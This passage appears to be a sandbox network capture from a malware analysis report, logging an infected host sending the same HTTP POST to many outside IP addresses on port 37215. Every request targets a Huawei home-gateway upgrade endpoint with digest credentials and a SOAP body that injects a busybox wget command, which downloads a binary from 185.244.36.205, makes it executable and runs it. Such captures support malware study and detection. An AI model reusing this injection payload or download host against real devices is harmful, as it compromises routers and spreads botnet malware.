                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              723192.168.2.155238431.108.27.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226186037 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              724192.168.2.1549888157.2.175.23037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226198912 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              725192.168.2.1558996190.231.158.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226242065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              726192.168.2.154752041.200.130.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226284027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              727192.168.2.155668831.187.180.11137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226349115 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              728192.168.2.153908837.167.188.7237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226349115 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              729192.168.2.1540400181.162.6.15937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226349115 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              730192.168.2.1538802121.174.19.037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226368904 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              731192.168.2.1548104157.146.142.23837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226428032 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              732192.168.2.1554316181.158.42.1337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226428032 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
